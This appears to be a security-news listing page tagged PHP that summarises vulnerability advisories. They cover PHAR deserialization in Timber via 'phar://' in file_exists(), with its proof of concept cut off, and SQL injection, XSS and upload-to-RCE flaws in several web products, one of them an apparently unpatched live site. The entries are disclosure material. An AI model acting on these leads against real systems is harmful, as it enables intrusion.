Security
Headlines
HeadlinesLatestCVEs

Tag

#php

GHSA-6363-v5m4-fvq3: timber/timber vulnerable to Deserialization of Untrusted Data

### Summary Timber is vulnerable to [PHAR deserialization](https://portswigger.net/web-security/deserialization/exploiting#phar-deserialization) due to a lack of checking the input before passing it into the` file_exists()` function. If an attacker can upload files of any type to the server, he can pass in the `phar://` protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when Timber is used with frameworks with documented POP chains like Wordpress/ vulnerable developer code. ### Details The vulnerability lies in the run function within the `toJpg.php` file. The two parameters passed into it are not checked or sanitized, hence an attacker could potentially inject malicious input leading to Deserialization of Untrusted Data, allowing for remote code execution: ![image](https://github.com/timber/timber/assets/89630690/bcd6d031-33c6-4cc5-96b7-b72f0cf0e26c) ### PoC Setup the following code in `/var/www/html`: `...

ghsa
Open in Source
#vulnerability#web#git#wordpress#php#rce
WordPress Playlist For Youtube 1.32 Cross Site Scripting

WordPress Playlist for Youtube plugin version 1.32 suffers from a persistent cross site scripting vulnerability.

GUnet OpenEclass E-learning 3.15 File Upload / Command Execution

GUnet OpenEclass E-learning platform version 3.15 suffers from an unrestricted file upload vulnerability in certbadge.php that allows for remote command execution.

Joomla SP Page Builder 5.2.7 SQL Injection

Joomla SP Page Builder component version 5.2.7 suffers from a remote SQL injection vulnerability.

The Essential Tools and Plugins for WordPress Development

By Owais Sultan WordPress, a widely used content management system, owes a great deal of its flexibility to plugins. These small… This is a post from HackRead.com Read the original post: The Essential Tools and Plugins for WordPress Development

Flightio.com SQL Injection

Flightio.com suffers from a remote SQL injection vulnerability. The researchers reporting this claimed the site has not responded to their reports so we are posting this to add visibility to the issue.

Daily Expense Manager 1.0 SQL Injection

Daily Expense Manager version 1.0 suffers from a remote SQL injection vulnerability.

GHSA-5297-wrrp-rcj7: Shopware Improper Session Handling in store-api account logout

### Impact When a authentificated request is made to `POST /store-api/account/logout`, the cart will be cleared, but the User won't be logged out. This affects only the direct store-api usage, as the PHP Storefront listens additionally on `CustomerLogoutEvent` and invalidates the session additionally. ### Patches The problem has been fixed with Shopware 6.6.1.0 and 6.5.8.8. ### Workarounds When you are not able to update, you can install the latest version of the Shopware Security Plugin.

Invision Community 4.7.16 Remote Code Execution

Invision Community versions 4.7.16 and below suffer from a remote code execution vulnerability in toolbar.php.